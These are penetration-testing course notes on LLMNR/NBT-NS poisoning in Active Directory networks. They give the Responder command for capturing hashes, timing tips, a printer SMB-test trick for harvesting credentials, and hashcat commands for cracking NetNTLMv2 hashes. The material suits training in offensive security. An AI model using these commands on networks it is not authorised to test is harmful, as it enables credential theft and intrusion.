# Week 8: LLMNR/NBT-NS Poisoning

**Hello Enumeration, My Old Friend** - This lesson will cover post-exploitation enumeration. In other words, we’ve gained access to a single machine in a network, now what are we looking for? The chapter will focus heavily on Active Directory enumeration concepts as that is the likely environment a pentester will encounter in the real world. However, lessons will be provided for non-Active Directory environments as well. Important tools that will be discussed are nbtscan, nslookup, nbtstat, net commands, and more.

**Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

* Wordlist Heath uses: `realuniq`

## LLMNR/NBT-NS Poisoning

* LLMNR/NBT-NS used to identify a host when DNS fails.
* Name resolution as a way to connect to a share (e.g. SMB)
* Hashes are typically going out to a known share or device.
  * Sometimes don't know where to go and will send a broadcast message. Man in the Middle can say send me your hash and I can connect you.

![Victim tries to access //hackme share, but instead looks for //hackm](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIRaNGBKBYSik7a9sG%2F-MFIXFVEo1MEtpt_wvAT%2F2020-08-21%2017_19_01-Window.png?alt=media\&token=7a48a9c1-bf07-4d50-94de-ed5fdbe761e7)

* Crack the hash then navigate around the network and see what sticks.
* Or, relay the hash without ever knowing the password, **NTLM relay**

### Responder

Sitting on the network with no privileges, turn on Responder before running scans. (Internal Technique, not on OSCP)

* * Scans (nmap, nessus, etc) generates traffic. The more traffic on the network, the better it is for an attacker. Maybe something screws up and sends a hash your way.
  * Best time to run Responder is beginning of the day or after lunch. You can leave it on all day.
* Responder.py: `/usr/share/responder` on Kali

```
python Responder.py -I eth0 -rdw
```

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIRaNGBKBYSik7a9sG%2F-MFIc9A8J_G7mLPjVzwk%2F2020-08-21%2017_45_01-Window.png?alt=media\&token=ac101aaf-97f4-4332-b6e5-fe3c91145325)

* if you find Default credentials anywhere with configuration abilities (e.g. a Printer), there can be a test SMB share button. If you send it to yourself, you can get credentials. SMB sometimes doesn't follow least-privileged and you can get an instant win.

### Hashcat

```
# Linux --VMs will take much longer
hashcat -m 5600 hash.txt /root/rockyou.txt #NetNTLMv2

# Windows
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt
```

## Defenses

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIf5Y5m7l7U37myWyF%2F-MFIffISQewWZeyLOE4e%2F2020-08-21%2018_00_30-Window.png?alt=media\&token=9bff0fc8-b738-4580-88ff-0a32ec7b7a3d)